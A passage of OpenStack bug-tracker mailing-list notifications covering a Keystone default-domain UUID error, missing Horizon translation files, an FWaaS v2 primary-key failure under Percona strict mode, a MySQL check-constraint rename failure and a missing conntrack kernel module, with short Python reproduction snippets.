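Hugepagesize:       2048 kB
"""
# 1024 free 2 MiB pages = 2 GiB available for hugepage-backed guests:
print(free_hugepage_kb(sample))  # → 2097152
```

On a NUMA host the per-node breakdown under /sys/devices/system/node/node*/hugepages matters as well, since nova places guest memory per NUMA node; a node-level shortfall can trigger this error even when the host-wide totals look sufficient.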
[Yahoo-eng-team] [Bug 1859844] Re: Impossible to rename the Default domain id to the string 'default.'
** Changed in: charm-keystone Status: Invalid => New -- You received this bug notification because you are a member of Yahoo! Engineering Team, which is subscribed to OpenStack Identity (keystone). https://bugs.launchpad.net/bugs/1859844 Title: Impossible to rename the Default domain id to the string 'default.' Status in OpenStack keystone charm: New Status in OpenStack Identity (keystone): Invalid Status in keystone package in Ubuntu: Invalid Bug description: Openstack version = Rocky When changing the 'default_domain_id' variable to the string 'default' and changing all references for this variable in the keystone database we get the following error in keystone.log: (keystone.common.wsgi): 2020-01-15 14:16:37,869 ERROR badly formed hexadecimal UUID string Traceback (most recent call last): File "/usr/lib/python3/dist-packages/keystone/common/wsgi.py", line 148, in __call__ result = method(req, **params) File "/usr/lib/python3/dist-packages/keystone/auth/controllers.py", line 102, in authenticate_for_token app_cred_id=app_cred_id, parent_audit_id=token_audit_id) File "/usr/lib/python3/dist-packages/keystone/common/manager.py", line 116, in wrapped __ret_val = __f(*args, **kwargs) File "/usr/lib/python3/dist-packages/keystone/token/provider.py", line 251, in issue_token token_id, issued_at = self.driver.generate_id_and_issued_at(token) File "/usr/lib/python3/dist-packages/keystone/token/providers/fernet/core.py", line 61, in generate_id_and_issued_at app_cred_id=token.application_credential_id File "/usr/lib/python3/dist-packages/keystone/token/token_formatters.py", line 159, in create_token protocol_id, access_token_id, app_cred_id File "/usr/lib/python3/dist-packages/keystone/token/token_formatters.py", line 444, in assemble b_domain_id = cls.convert_uuid_hex_to_bytes(domain_id) File "/usr/lib/python3/dist-packages/keystone/token/token_formatters.py", line 290, in convert_uuid_hex_to_bytes uuid_obj = uuid.UUID(uuid_string) File "/usr/lib/python3.6/uuid.py", line 
140, in __init__ raise ValueError('badly formed hexadecimal UUID string') ValueError: badly formed hexadecimal UUID string
(keystone.common.wsgi): 2020-01-15 14:16:38,908 WARNING You are not authorized to perform the requested action: identity:get_domain.
(keystone.common.wsgi): 2020-01-15 14:16:39,058 WARNING You are not authorized to perform the requested action: identity:get_domain.
(keystone.common.wsgi): 2020-01-15 14:16:50,838 WARNING You are not authorized to perform the requested action: identity:list_projects.
(keystone.common.wsgi): 2020-01-15 14:16:54,086 WARNING You are not authorized to perform the requested action: identity:list_projects.
This change is needed to integrate keystone to ICO (IBM Cloud Orchestrator). To manage notifications about this bug go to: https://bugs.launchpad.net/charm-keystone/+bug/1859844/+subscriptions
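The traceback bottoms out in `uuid.UUID()`, which is why the rename cannot work: the fernet token formatter packs domain IDs into 16 raw bytes, and the literal string 'default' is not a hexadecimal UUID. Minimal reproduction of the conversion (the helper mirrors what the formatter does; the hex ID below is just an example value):

```python
import uuid


def convert_uuid_hex_to_bytes(uuid_string: str) -> bytes:
    # Same conversion the fernet token formatter performs on domain ids.
    return uuid.UUID(uuid_string).bytes


# A normal auto-generated domain id packs into 16 bytes:
print(len(convert_uuid_hex_to_bytes("87fb238ef6d0430cbda59b08e3a1ea82")))  # → 16

# The literal string 'default' does not:
try:
    convert_uuid_hex_to_bytes("default")
except ValueError as e:
    print(e)  # badly formed hexadecimal UUID string
```

Keystone special-cases the well-known 'default' domain id elsewhere, but an arbitrary non-hex domain id cannot survive this packing step, hence the 500s after the rename.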
[Yahoo-eng-team] [Bug 1862343] Re: Changing the language in GUI has almost no effect
Packages have PO files but not MO files - the package build does the compilation but the install step completely misses them. ** Changed in: horizon (Ubuntu) Status: New => Triaged ** Changed in: horizon (Ubuntu) Importance: Undecided => High ** Also affects: horizon (Ubuntu Eoan) Importance: Undecided Status: New ** Also affects: horizon (Ubuntu Focal) Importance: High Status: Triaged ** Also affects: cloud-archive Importance: Undecided Status: New ** Also affects: cloud-archive/rocky Importance: Undecided Status: New ** Also affects: cloud-archive/ussuri Importance: Undecided Status: New ** Also affects: cloud-archive/train Importance: Undecided Status: New ** Also affects: cloud-archive/stein Importance: Undecided Status: New ** Changed in: horizon (Ubuntu Eoan) Importance: Undecided => High ** Summary changed: - Changing the language in GUI has almost no effect + compiled messages not shipped in packaging resulting in missing translations -- You received this bug notification because you are a member of Yahoo! Engineering Team, which is subscribed to OpenStack Dashboard (Horizon). https://bugs.launchpad.net/bugs/1862343 Title: compiled messages not shipped in packaging resulting in missing translations Status in OpenStack openstack-dashboard charm: Invalid Status in Ubuntu Cloud Archive: New Status in Ubuntu Cloud Archive rocky series: New Status in Ubuntu Cloud Archive stein series: New Status in Ubuntu Cloud Archive train series: New Status in Ubuntu Cloud Archive ussuri series: New Status in OpenStack Dashboard (Horizon): Invalid Status in horizon package in Ubuntu: Triaged Status in horizon source package in Eoan: New Status in horizon source package in Focal: Triaged Bug description: I changed the language in GUI to French but interface stays mostly English. 
Just a few strings are displayed in French, e.g.: - "Password" ("Mot de passe") on the login screen, - units "GB", "TB" as "Gio" and "Tio" in Compute Overview, - "New password" ("Nouveau mot de passe") in User Settings. All other strings are in English. See screenshots attached. This is a Stein on Ubuntu Bionic deployment. To manage notifications about this bug go to: https://bugs.launchpad.net/charm-openstack-dashboard/+bug/1862343/+subscriptions
[Yahoo-eng-team] [Bug 1862343] Re: Changing the language in GUI has almost no effect
It looks like the translation compilation never happens: if you drop into /usr/share/openstack-dashboard, run "sudo python3 manage.py compilemessages", and then restart Apache, the translations appear to be OK. ** Also affects: horizon (Ubuntu) Importance: Undecided Status: New ** Changed in: charm-openstack-dashboard Status: New => Invalid ** Changed in: horizon Status: New => Invalid -- You received this bug notification because you are a member of Yahoo! Engineering Team, which is subscribed to OpenStack Dashboard (Horizon). https://bugs.launchpad.net/bugs/1862343 Title: Changing the language in GUI has almost no effect Status in OpenStack openstack-dashboard charm: Invalid Status in OpenStack Dashboard (Horizon): Invalid Status in horizon package in Ubuntu: New Bug description: I changed the language in the GUI to French but the interface stays mostly in English. Just a few strings are displayed in French, e.g.: - "Password" ("Mot de passe") on the login screen, - units "GB", "TB" as "Gio" and "Tio" in Compute Overview, - "New password" ("Nouveau mot de passe") in User Settings. All other strings are in English. See screenshots attached. This is a Stein on Ubuntu Bionic deployment. To manage notifications about this bug go to: https://bugs.launchpad.net/charm-openstack-dashboard/+bug/1862343/+subscriptions
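The missing compiled catalogs can be spotted without restarting anything: a `.po` source with no `.mo` next to it will never be served by Django. A minimal sketch, assuming a Django-style `LC_MESSAGES` locale layout; `find_missing_mo` is a hypothetical helper, not part of Horizon:

```python
from pathlib import Path

def find_missing_mo(locale_root):
    """Return .po catalog files that have no compiled .mo sibling."""
    missing = []
    for po in Path(locale_root).rglob("*.po"):
        # compilemessages writes django.mo next to django.po
        if not po.with_suffix(".mo").exists():
            missing.append(po)
    return sorted(missing)
```

Pointing this at the package's locale directory would show exactly which languages the install step missed.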
[Yahoo-eng-team] [Bug 1831986] Re: fwaas_v2 - unable to associate port with firewall (PXC strict mode)
** Changed in: cloud-archive/stein Status: Fix Committed => Fix Released -- You received this bug notification because you are a member of Yahoo! Engineering Team, which is subscribed to neutron. https://bugs.launchpad.net/bugs/1831986 Title: fwaas_v2 - unable to associate port with firewall (PXC strict mode) Status in Ubuntu Cloud Archive: Fix Released Status in Ubuntu Cloud Archive rocky series: Won't Fix Status in Ubuntu Cloud Archive stein series: Fix Released Status in Ubuntu Cloud Archive train series: Fix Released Status in neutron: In Progress Status in neutron-fwaas package in Ubuntu: Fix Released Status in neutron-fwaas source package in Disco: Won't Fix Status in neutron-fwaas source package in Eoan: Fix Released Bug description: [Impact] Unable to associate ports with a firewall under FWaaS v2 [Test Case] Deploy OpenStack (Stein or later) using charms; create a firewall policy and apply it to a router. This fails because the port cannot be associated with the policy in the underlying DB. [Regression Potential] Medium; the proposed fix has not yet been accepted upstream (discussion is ongoing due to the change of database migrations). [Original Bug Report] Impacts both Stein and Rocky (although Rocky does not enable v2 just yet).
542 a9761fa9124740028d0c1d70ff7aa542] DBAPIError exception wrapped from (pymysql.err.InternalError) (1105, 'Percona-XtraDB-Cluster prohibits use of DML command on a table (neutron.firewall_group_port_associations_v2) without an explicit primary key with pxc_strict_mode = ENFORCING or MASTER') [SQL: 'DELETE FROM firewall_group_port_associations_v2 WHERE firewall_group_port_associations_v2.firewall_group_id = %(firewall_group_id_1)s'] [parameters: {'firewall_group_id_1': '85a277d0-ebaf-4a5d-9d45-6a74b8f54372'}] (Background on this error at: http://sqlalche.me/e/2j85): pymysql.err.InternalError: (1105, 'Percona-XtraDB-Cluster prohibits use of DML command on a table (neutron.firewall_group_port_associations_v2) without an explicit primary key with pxc_strict_mode = ENFORCING or MASTER') 2019-06-07 10:07:50.937 30837 ERROR oslo_db.sqlalchemy.exc_filters Traceback (most recent call last): 2019-06-07 10:07:50.937 30837 ERROR oslo_db.sqlalchemy.exc_filters File "/usr/lib/python3/dist-packages/sqlalchemy/engine/base.py", line 1193, in _execute_context 2019-06-07 10:07:50.937 30837 ERROR oslo_db.sqlalchemy.exc_filters context) 2019-06-07 10:07:50.937 30837 ERROR oslo_db.sqlalchemy.exc_filters File "/usr/lib/python3/dist-packages/sqlalchemy/engine/default.py", line 509, in do_execute 2019-06-07 10:07:50.937 30837 ERROR oslo_db.sqlalchemy.exc_filters cursor.execute(statement, parameters) 2019-06-07 10:07:50.937 30837 ERROR oslo_db.sqlalchemy.exc_filters File "/usr/lib/python3/dist-packages/pymysql/cursors.py", line 165, in execute 2019-06-07 10:07:50.937 30837 ERROR oslo_db.sqlalchemy.exc_filters result = self._query(query) 2019-06-07 10:07:50.937 30837 ERROR oslo_db.sqlalchemy.exc_filters File "/usr/lib/python3/dist-packages/pymysql/cursors.py", line 321, in _query 2019-06-07 10:07:50.937 30837 ERROR oslo_db.sqlalchemy.exc_filters conn.query(q) 2019-06-07 10:07:50.937 30837 ERROR oslo_db.sqlalchemy.exc_filters File "/usr/lib/python3/dist-packages/pymysql/connections.py", line 
860, in query 2019-06-07 10:07:50.937 30837 ERROR oslo_db.sqlalchemy.exc_filters self._affected_rows = self._read_query_result(unbuffered=unbuffered) 2019-06-07 10:07:50.937 30837 ERROR oslo_db.sqlalchemy.exc_filters File "/usr/lib/python3/dist-packages/pymysql/connections.py", line 1061, in _read_query_result 2019-06-07 10:07:50.937 30837 ERROR oslo_db.sqlalchemy.exc_filters result.read() 2019-06-07 10:07:50.937 30837 ERROR oslo_db.sqlalchemy.exc_filters File "/usr/lib/python3/dist-packages/pymysql/connections.py", line 1349, in read 2019-06-07 10:07:50.937 30837 ERROR oslo_db.sqlalchemy.exc_filters first_packet = self.connection._read_packet() 2019-06-07 10:07:50.937 30837 ERROR oslo_db.sqlalchemy.exc_filters File "/usr/lib/python3/dist-packages/pymysql/connections.py", line 1018, in _read_packet 2019-06-07 10:07:50.937 30837 ERROR oslo_db.sqlalchemy.exc_filters packet.check_error() 2019-06-07 10:07:50.937 30837 ERROR oslo_db.sqlalchemy.exc_filters File "/usr/lib/python3/dist-packages/pymysql/connections.py", line 384, in check_error 2019-06-07 10:07:50.937 30837 ERROR oslo_db.sqlalchemy.exc_filters err.raise_mysql_exception(self._data) 2019-06-07 10:07:50.937 30837 ERROR oslo_db.sqlalchemy.exc_filters File "/usr/lib/python3/dist-packages/pymysql/err.py", line 107, in raise_mysql_exception 2019-06-07 10:07:50.937 30837 ERROR oslo_db.sqlalchemy.exc_filters raise errorclass(errno, errval) 2019-06-07 10:07:50.937 30837 ERROR oslo_db.sqlalchemy.exc_filters pymysql.err.InternalError: (1105, 'Percona-XtraDB-Cluster prohibits use of DML command on a tab
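The later package update for this bug describes the fix as adding a missing primary key to the association table, which is exactly what PXC strict mode demands before allowing DML. A minimal sketch with sqlite3 (PXC's enforcement itself cannot be reproduced here; the composite key over `(firewall_group_id, port_id)` is an assumed illustration of that shape, with column names taken from the traceback):

```python
import sqlite3

conn = sqlite3.connect(":memory:")
# Association table with an explicit composite primary key, the
# property PXC strict mode requires for DELETE/UPDATE statements.
conn.execute("""
    CREATE TABLE firewall_group_port_associations_v2 (
        firewall_group_id VARCHAR(36) NOT NULL,
        port_id VARCHAR(36) NOT NULL,
        PRIMARY KEY (firewall_group_id, port_id)
    )
""")
conn.execute(
    "INSERT INTO firewall_group_port_associations_v2 VALUES (?, ?)",
    ("85a277d0-ebaf-4a5d-9d45-6a74b8f54372", "port-1"),
)
# The DELETE from the traceback, now targeting a keyed table.
conn.execute(
    "DELETE FROM firewall_group_port_associations_v2 "
    "WHERE firewall_group_id = ?",
    ("85a277d0-ebaf-4a5d-9d45-6a74b8f54372",),
)
remaining = conn.execute(
    "SELECT COUNT(*) FROM firewall_group_port_associations_v2"
).fetchone()[0]
```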
[Yahoo-eng-team] [Bug 1859844] Re: Impossible to rename the Default domain id to the string 'default.'
FTR charm has written the UUID to the configuration file for the last 3 years: https://opendev.org/openstack/charm-keystone/commit/ccf15398 ** Also affects: keystone (Ubuntu) Importance: Undecided Status: New ** Changed in: keystone Status: Incomplete => Invalid ** Also affects: charm-keystone Importance: Undecided Status: New -- You received this bug notification because you are a member of Yahoo! Engineering Team, which is subscribed to OpenStack Identity (keystone). https://bugs.launchpad.net/bugs/1859844 Title: Impossible to rename the Default domain id to the string 'default.' Status in OpenStack keystone charm: New Status in OpenStack Identity (keystone): Invalid Status in keystone package in Ubuntu: New Bug description: Openstack version = Rocky When changing the 'default_domain_id' variable to the string 'default' and changing all references for this variable in the keystone database we get the following error in keystone.log: (keystone.common.wsgi): 2020-01-15 14:16:37,869 ERROR badly formed hexadecimal UUID string Traceback (most recent call last): File "/usr/lib/python3/dist-packages/keystone/common/wsgi.py", line 148, in __call__ result = method(req, **params) File "/usr/lib/python3/dist-packages/keystone/auth/controllers.py", line 102, in authenticate_for_token app_cred_id=app_cred_id, parent_audit_id=token_audit_id) File "/usr/lib/python3/dist-packages/keystone/common/manager.py", line 116, in wrapped __ret_val = __f(*args, **kwargs) File "/usr/lib/python3/dist-packages/keystone/token/provider.py", line 251, in issue_token token_id, issued_at = self.driver.generate_id_and_issued_at(token) File "/usr/lib/python3/dist-packages/keystone/token/providers/fernet/core.py", line 61, in generate_id_and_issued_at app_cred_id=token.application_credential_id File "/usr/lib/python3/dist-packages/keystone/token/token_formatters.py", line 159, in create_token protocol_id, access_token_id, app_cred_id File 
"/usr/lib/python3/dist-packages/keystone/token/token_formatters.py", line 444, in assemble b_domain_id = cls.convert_uuid_hex_to_bytes(domain_id) File "/usr/lib/python3/dist-packages/keystone/token/token_formatters.py", line 290, in convert_uuid_hex_to_bytes uuid_obj = uuid.UUID(uuid_string) File "/usr/lib/python3.6/uuid.py", line 140, in __init__ raise ValueError('badly formed hexadecimal UUID string') ValueError: badly formed hexadecimal UUID string (keystone.common.wsgi): 2020-01-15 14:16:38,908 WARNING You are not authorized to perform the requested action: identity:get_domain. (keystone.common.wsgi): 2020-01-15 14:16:39,058 WARNING You are not authorized to perform the requested action: identity:get_domain. (keystone.common.wsgi): 2020-01-15 14:16:50,838 WARNING You are not authorized to perform the requested action: identity:list_projects. (keystone.common.wsgi): 2020-01-15 14:16:54,086 WARNING You are not authorized to perform the requested action: identity:list_projects. This change is needed to integrate keystone to ICO (IBM Cloud Orchestrator) To manage notifications about this bug go to: https://bugs.launchpad.net/charm-keystone/+bug/1859844/+subscriptions -- Mailing list: https://launchpad.net/~yahoo-eng-team Post to : yahoo-eng-team@lists.launchpad.net Unsubscribe : https://launchpad.net/~yahoo-eng-team More help : https://help.launchpad.net/ListHelp
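The failure mode is easy to reproduce in isolation: the fernet token formatter packs the domain id as raw UUID bytes, so any id that is not a hexadecimal UUID raises ValueError. A simplified sketch; `convert_uuid_hex_to_bytes` below mirrors the keystone helper of the same name from the traceback but is a standalone re-implementation, not keystone's code:

```python
import uuid

def convert_uuid_hex_to_bytes(value):
    # The fernet formatter shrinks ids to 16 raw bytes; this only
    # works when the id parses as a hexadecimal UUID.
    return uuid.UUID(value).bytes

# A UUID-shaped domain id packs fine...
ok = convert_uuid_hex_to_bytes("aa9f203bec5148939bdacfadbff9f800")

# ...but the literal string 'default' cannot be parsed as a UUID.
try:
    convert_uuid_hex_to_bytes("default")
    failed = False
except ValueError:
    failed = True
```

This is why renaming the domain id to the string 'default' in the database breaks token issuance with "badly formed hexadecimal UUID string".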
[Yahoo-eng-team] [Bug 1831986] Re: fwaas_v2 - unable to associate port with firewall (PXC strict mode)
** Description changed: - Impacts both Stein and Rocky (although rocky does not enable v2 just - yet). + [Impact] + Unable to associate ports with a firewall under FWaaS v2 + + [Test Case] + Deploy OpenStack (stein or Later) using Charms + Create firewall policy, apply to router - failure as unable to associate port with policy in underlying DB + + [Regression Potential] + Medium; the proposed fix has not been accepted upstream as yet (discussion ongoing due to change of database migrations). + + [Original Bug Report] + Impacts both Stein and Rocky (although rocky does not enable v2 just yet). 542 a9761fa9124740028d0c1d70ff7aa542] DBAPIError exception wrapped from (pymysql.err.InternalError) (1105, 'Percona-XtraDB-Cluster prohibits use of DML command on a table (neutron.firewall_group_port_associations_v2) without an explicit primary key with pxc_strict_mode = ENFORCING or MASTER') [SQL: 'DELETE FROM firewall_group_port_associations_v2 WHERE firewall_group_port_associations_v2.firewall_group_id = %(firewall_group_id_1)s'] [parameters: {'firewall_group_id_1': '85a277d0-ebaf-4a5d-9d45-6a74b8f54372'}] (Background on this error at: http://sqlalche.me/e/2j85): pymysql.err.InternalError: (1105, 'Percona-XtraDB-Cluster prohibits use of DML command on a table (neutron.firewall_group_port_associations_v2) without an explicit primary key with pxc_strict_mode = ENFORCING or MASTER') 2019-06-07 10:07:50.937 30837 ERROR oslo_db.sqlalchemy.exc_filters Traceback (most recent call last): 2019-06-07 10:07:50.937 30837 ERROR oslo_db.sqlalchemy.exc_filters File "/usr/lib/python3/dist-packages/sqlalchemy/engine/base.py", line 1193, in _execute_context 2019-06-07 10:07:50.937 30837 ERROR oslo_db.sqlalchemy.exc_filters context) 2019-06-07 10:07:50.937 30837 ERROR oslo_db.sqlalchemy.exc_filters File "/usr/lib/python3/dist-packages/sqlalchemy/engine/default.py", line 509, in do_execute 2019-06-07 10:07:50.937 30837 ERROR oslo_db.sqlalchemy.exc_filters cursor.execute(statement, parameters) 
2019-06-07 10:07:50.937 30837 ERROR oslo_db.sqlalchemy.exc_filters File "/usr/lib/python3/dist-packages/pymysql/cursors.py", line 165, in execute 2019-06-07 10:07:50.937 30837 ERROR oslo_db.sqlalchemy.exc_filters result = self._query(query) 2019-06-07 10:07:50.937 30837 ERROR oslo_db.sqlalchemy.exc_filters File "/usr/lib/python3/dist-packages/pymysql/cursors.py", line 321, in _query 2019-06-07 10:07:50.937 30837 ERROR oslo_db.sqlalchemy.exc_filters conn.query(q) 2019-06-07 10:07:50.937 30837 ERROR oslo_db.sqlalchemy.exc_filters File "/usr/lib/python3/dist-packages/pymysql/connections.py", line 860, in query 2019-06-07 10:07:50.937 30837 ERROR oslo_db.sqlalchemy.exc_filters self._affected_rows = self._read_query_result(unbuffered=unbuffered) 2019-06-07 10:07:50.937 30837 ERROR oslo_db.sqlalchemy.exc_filters File "/usr/lib/python3/dist-packages/pymysql/connections.py", line 1061, in _read_query_result 2019-06-07 10:07:50.937 30837 ERROR oslo_db.sqlalchemy.exc_filters result.read() 2019-06-07 10:07:50.937 30837 ERROR oslo_db.sqlalchemy.exc_filters File "/usr/lib/python3/dist-packages/pymysql/connections.py", line 1349, in read 2019-06-07 10:07:50.937 30837 ERROR oslo_db.sqlalchemy.exc_filters first_packet = self.connection._read_packet() 2019-06-07 10:07:50.937 30837 ERROR oslo_db.sqlalchemy.exc_filters File "/usr/lib/python3/dist-packages/pymysql/connections.py", line 1018, in _read_packet 2019-06-07 10:07:50.937 30837 ERROR oslo_db.sqlalchemy.exc_filters packet.check_error() 2019-06-07 10:07:50.937 30837 ERROR oslo_db.sqlalchemy.exc_filters File "/usr/lib/python3/dist-packages/pymysql/connections.py", line 384, in check_error 2019-06-07 10:07:50.937 30837 ERROR oslo_db.sqlalchemy.exc_filters err.raise_mysql_exception(self._data) 2019-06-07 10:07:50.937 30837 ERROR oslo_db.sqlalchemy.exc_filters File "/usr/lib/python3/dist-packages/pymysql/err.py", line 107, in raise_mysql_exception 2019-06-07 10:07:50.937 30837 ERROR oslo_db.sqlalchemy.exc_filters raise 
errorclass(errno, errval) 2019-06-07 10:07:50.937 30837 ERROR oslo_db.sqlalchemy.exc_filters pymysql.err.InternalError: (1105, 'Percona-XtraDB-Cluster prohibits use of DML command on a table (neutron.firewall_group_port_associations_v2) without an explicit primary key with pxc_strict_mode = ENFORCING or MASTER') 2019-06-07 10:07:50.937 30837 ERROR oslo_db.sqlalchemy.exc_filters ProblemType: Bug DistroRelease: Ubuntu 18.04 Package: neutron-server 2:14.0.0-0ubuntu1.1~cloud0 [origin: Canonical] ProcVersionSignature: Ubuntu 4.15.0-51.55-generic 4.15.18 Uname: Linux 4.15.0-51-generic x86_64 ApportVersion: 2.20.9-0ubuntu7.6 Architecture: amd64 CrashDB: Â { "impl": "launchpad", "project": "cloud-archive", "bug_pattern_url": "http://people.canonical.com/~ubuntu-archive/bugpatt
[Yahoo-eng-team] [Bug 1831986] Re: fwaas_v2 - unable to associate port with firewall (PXC strict mode)
This bug was fixed in the package neutron-fwaas - 1:15.0.0~rc1-0ubuntu3~cloud0 --- neutron-fwaas (1:15.0.0~rc1-0ubuntu3~cloud0) bionic-train; urgency=medium . * New update for the Ubuntu Cloud Archive. . neutron-fwaas (1:15.0.0~rc1-0ubuntu3) eoan; urgency=medium . * d/p/add-missing-pk-firewall-group-associations-v2.patch: Cherry pick fix to resolve issue with missing primary key on firewall_group_associations_v2 table (LP: #1831986). ** Changed in: cloud-archive Status: Triaged => Fix Released -- You received this bug notification because you are a member of Yahoo! Engineering Team, which is subscribed to neutron. https://bugs.launchpad.net/bugs/1831986 Title: fwaas_v2 - unable to associate port with firewall (PXC strict mode) Status in Ubuntu Cloud Archive: Fix Released Status in Ubuntu Cloud Archive rocky series: Triaged Status in Ubuntu Cloud Archive stein series: Triaged Status in Ubuntu Cloud Archive train series: Fix Released Status in neutron: In Progress Status in neutron-fwaas package in Ubuntu: Fix Released Status in neutron-fwaas source package in Disco: Triaged Status in neutron-fwaas source package in Eoan: Fix Released Bug description: Impacts both Stein and Rocky (although rocky does not enable v2 just yet). 
542 a9761fa9124740028d0c1d70ff7aa542] DBAPIError exception wrapped from (pymysql.err.InternalError) (1105, 'Percona-XtraDB-Cluster prohibits use of DML command on a table (neutron.firewall_group_port_associations_v2) without an explicit primary key with pxc_strict_mode = ENFORCING or MASTER') [SQL: 'DELETE FROM firewall_group_port_associations_v2 WHERE firewall_group_port_associations_v2.firewall_group_id = %(firewall_group_id_1)s'] [parameters: {'firewall_group_id_1': '85a277d0-ebaf-4a5d-9d45-6a74b8f54372'}] (Background on this error at: http://sqlalche.me/e/2j85): pymysql.err.InternalError: (1105, 'Percona-XtraDB-Cluster prohibits use of DML command on a table (neutron.firewall_group_port_associations_v2) without an explicit primary key with pxc_strict_mode = ENFORCING or MASTER') 2019-06-07 10:07:50.937 30837 ERROR oslo_db.sqlalchemy.exc_filters Traceback (most recent call last): 2019-06-07 10:07:50.937 30837 ERROR oslo_db.sqlalchemy.exc_filters File "/usr/lib/python3/dist-packages/sqlalchemy/engine/base.py", line 1193, in _execute_context 2019-06-07 10:07:50.937 30837 ERROR oslo_db.sqlalchemy.exc_filters context) 2019-06-07 10:07:50.937 30837 ERROR oslo_db.sqlalchemy.exc_filters File "/usr/lib/python3/dist-packages/sqlalchemy/engine/default.py", line 509, in do_execute 2019-06-07 10:07:50.937 30837 ERROR oslo_db.sqlalchemy.exc_filters cursor.execute(statement, parameters) 2019-06-07 10:07:50.937 30837 ERROR oslo_db.sqlalchemy.exc_filters File "/usr/lib/python3/dist-packages/pymysql/cursors.py", line 165, in execute 2019-06-07 10:07:50.937 30837 ERROR oslo_db.sqlalchemy.exc_filters result = self._query(query) 2019-06-07 10:07:50.937 30837 ERROR oslo_db.sqlalchemy.exc_filters File "/usr/lib/python3/dist-packages/pymysql/cursors.py", line 321, in _query 2019-06-07 10:07:50.937 30837 ERROR oslo_db.sqlalchemy.exc_filters conn.query(q) 2019-06-07 10:07:50.937 30837 ERROR oslo_db.sqlalchemy.exc_filters File "/usr/lib/python3/dist-packages/pymysql/connections.py", line 
860, in query 2019-06-07 10:07:50.937 30837 ERROR oslo_db.sqlalchemy.exc_filters self._affected_rows = self._read_query_result(unbuffered=unbuffered) 2019-06-07 10:07:50.937 30837 ERROR oslo_db.sqlalchemy.exc_filters File "/usr/lib/python3/dist-packages/pymysql/connections.py", line 1061, in _read_query_result 2019-06-07 10:07:50.937 30837 ERROR oslo_db.sqlalchemy.exc_filters result.read() 2019-06-07 10:07:50.937 30837 ERROR oslo_db.sqlalchemy.exc_filters File "/usr/lib/python3/dist-packages/pymysql/connections.py", line 1349, in read 2019-06-07 10:07:50.937 30837 ERROR oslo_db.sqlalchemy.exc_filters first_packet = self.connection._read_packet() 2019-06-07 10:07:50.937 30837 ERROR oslo_db.sqlalchemy.exc_filters File "/usr/lib/python3/dist-packages/pymysql/connections.py", line 1018, in _read_packet 2019-06-07 10:07:50.937 30837 ERROR oslo_db.sqlalchemy.exc_filters packet.check_error() 2019-06-07 10:07:50.937 30837 ERROR oslo_db.sqlalchemy.exc_filters File "/usr/lib/python3/dist-packages/pymysql/connections.py", line 384, in check_error 2019-06-07 10:07:50.937 30837 ERROR oslo_db.sqlalchemy.exc_filters err.raise_mysql_exception(self._data) 2019-06-07 10:07:50.937 30837 ERROR oslo_db.sqlalchemy.exc_filters File "/usr/lib/python3/dist-packages/pymysql/err.py", line 107, in raise_mysql_exception 2019-06-07 10:07:50.937 30837 ERROR oslo_db.sqlalchemy.exc_filters raise errorclass(errno, errval) 2019-06-07 10:07:50.937 30837 ERROR oslo_db.sqlalchemy.exc_filters pymysql.err.InternalError: (1105, 'Percona-XtraDB-Cluster pro
[Yahoo-eng-team] [Bug 1846606] Re: [eoan] Unknown column 'public' in 'firewall_rules_v2'
I think the check constraint is automatically created by sqlalchemy to enforce the Boolean type definition. ** Changed in: neutron (Ubuntu) Assignee: (unassigned) => James Page (james-page) ** Package changed: neutron (Ubuntu) => neutron-fwaas (Ubuntu) ** Changed in: neutron-fwaas (Ubuntu) Assignee: James Page (james-page) => (unassigned) -- You received this bug notification because you are a member of Yahoo! Engineering Team, which is subscribed to neutron. https://bugs.launchpad.net/bugs/1846606 Title: [eoan] Unknown column 'public' in 'firewall_rules_v2' Status in neutron: New Status in neutron-fwaas package in Ubuntu: Confirmed Bug description: I installed a fresh OpenStack test cluster on Eoan today (October 3). Neutron database initialization with the command: sudo su -s /bin/sh -c "neutron-db-manage --config-file /etc/neutron/neutron.conf --config-file /etc/neutron/plugins/ml2/ml2_conf.ini upgrade head" neutron failed with error message: oslo_db.exception.DBError: (pymysql.err.InternalError) (1054, "Unknown column 'public' in 'firewall_rules_v2'") [SQL: 'ALTER TABLE firewall_rules_v2 CHANGE public shared BOOL NULL'] (Background on this error at: http://sqlalche.me/e/2j85) In MySQL the table and the column exist, with a constraint on the column: CONSTRAINT `firewall_rules_v2_chk_1` CHECK ((`public` in (0,1))), Manually updating the column in MySQL failed with the same error message. mysql> ALTER TABLE firewall_rules_v2 CHANGE public shared BOOL NULL; ERROR 1054 (42S22): Unknown column 'public' in 'check constraint firewall_rules_v2_chk_1 expression' I guessed the constraint did not allow the column to be renamed. I removed the column 'public' and created it again without the constraint. Then the ALTER TABLE command worked fine. After doing the same for the 'public' columns in the firewall_groups_v2 and firewall_policies_v2 tables, Neutron could initialize the database and all was fine (I could create a network and start an instance).
neutron 2:15.0.0~rc1-0ubuntu1 mysql-server 8.0.16-0ubuntu3 To manage notifications about this bug go to: https://bugs.launchpad.net/neutron/+bug/1846606/+subscriptions
[Yahoo-eng-team] [Bug 1834213] Re: After kernel upgrade, nf_conntrack_ipv4 module unloaded, no IP traffic to instances
Adding a neutron bug-task to get an upstream opinion on whether neutron should be loading these modules as the n-ovs-agent starts up. ** Also affects: neutron Importance: Undecided Status: New -- You received this bug notification because you are a member of Yahoo! Engineering Team, which is subscribed to neutron. https://bugs.launchpad.net/bugs/1834213 Title: After kernel upgrade, nf_conntrack_ipv4 module unloaded, no IP traffic to instances Status in OpenStack neutron-openvswitch charm: Fix Committed Status in neutron: New Status in linux package in Ubuntu: Confirmed Bug description: With an environment running Xenial-Queens, and having just upgraded the linux-image-generic kernel for MDS patching, a few of our hypervisor hosts that were rebooted (3 out of 100) ended up dropping IP (tcp/udp) ingress traffic. It turns out that the nf_conntrack module was loaded, but nf_conntrack_ipv4 was not loading, and the traffic was being dropped by this rule: table=72, n_packets=214989, priority=50,ct_state=+inv+trk actions=resubmit(,93) The ct_state "inv" means invalid conntrack state, which the manpage describes as: The state is invalid, meaning that the connection tracker couldn’t identify the connection. This flag is a catch-all for problems in the connection or the connection tracker, such as: • L3/L4 protocol handler is not loaded/unavailable. With the Linux kernel datapath, this may mean that the nf_conntrack_ipv4 or nf_conntrack_ipv6 modules are not loaded. • L3/L4 protocol handler determines that the packet is malformed. • Packets are unexpected length for protocol. It appears that patching the OS of a hypervisor that is not running instances may fail to update the initrd to load nf_conntrack_ipv4 (and/or _ipv6). I couldn't find anywhere in the charm code that this would be loaded unless the charm's "harden" option is used on the nova-compute charm (see charmhelpers contrib/host templates).
